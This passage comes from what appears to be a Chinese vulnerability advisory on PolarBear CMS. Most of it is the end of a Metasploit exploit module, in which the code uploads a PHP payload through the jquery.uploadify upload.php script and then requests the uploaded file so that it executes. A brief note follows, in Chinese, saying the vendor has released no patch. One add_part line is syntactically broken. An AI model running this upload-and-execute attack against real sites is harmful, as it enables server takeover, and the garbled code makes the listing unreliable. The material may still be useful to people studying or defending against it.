data = Rex::MIME::Message.new
data.add_part(php_payload, "application/octet-stream", nil, "form-data; name=\"Filedata\"; filename=\"#{@payload_name}\"")
data.add_part(normalize_uri(uri, 'includes', 'jquery.uploadify/',, nil, nil, "form-data; name=\"folder\"")
post_data = data.to_s.gsub(/^\r\n\-\-\_Part\_/, '--_Part_')
print_status("#{peer} - Uploading payload #{@payload_name}")
res = send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(uri, 'includes', 'jquery.uploadify', "upload.php?folder=#{upload_dir}"),
'ctype' => "multipart/form-data; boundary=#{data.bound}",
'data' => post_data
})
if not res or res.code != 200
fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Upload failed")
end
upload_uri = "#{upload_dir}#{@payload_name}"
print_status("#{peer} - Executing payload #{@payload_name}")
res = send_request_raw({
'uri' => upload_uri,
'method' => 'GET'
})
end
end
建议:
--------------------------------------------------------------------------------
厂商补丁:
PolarPearCms
------------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
https://code.google.com/p/polarbearcms/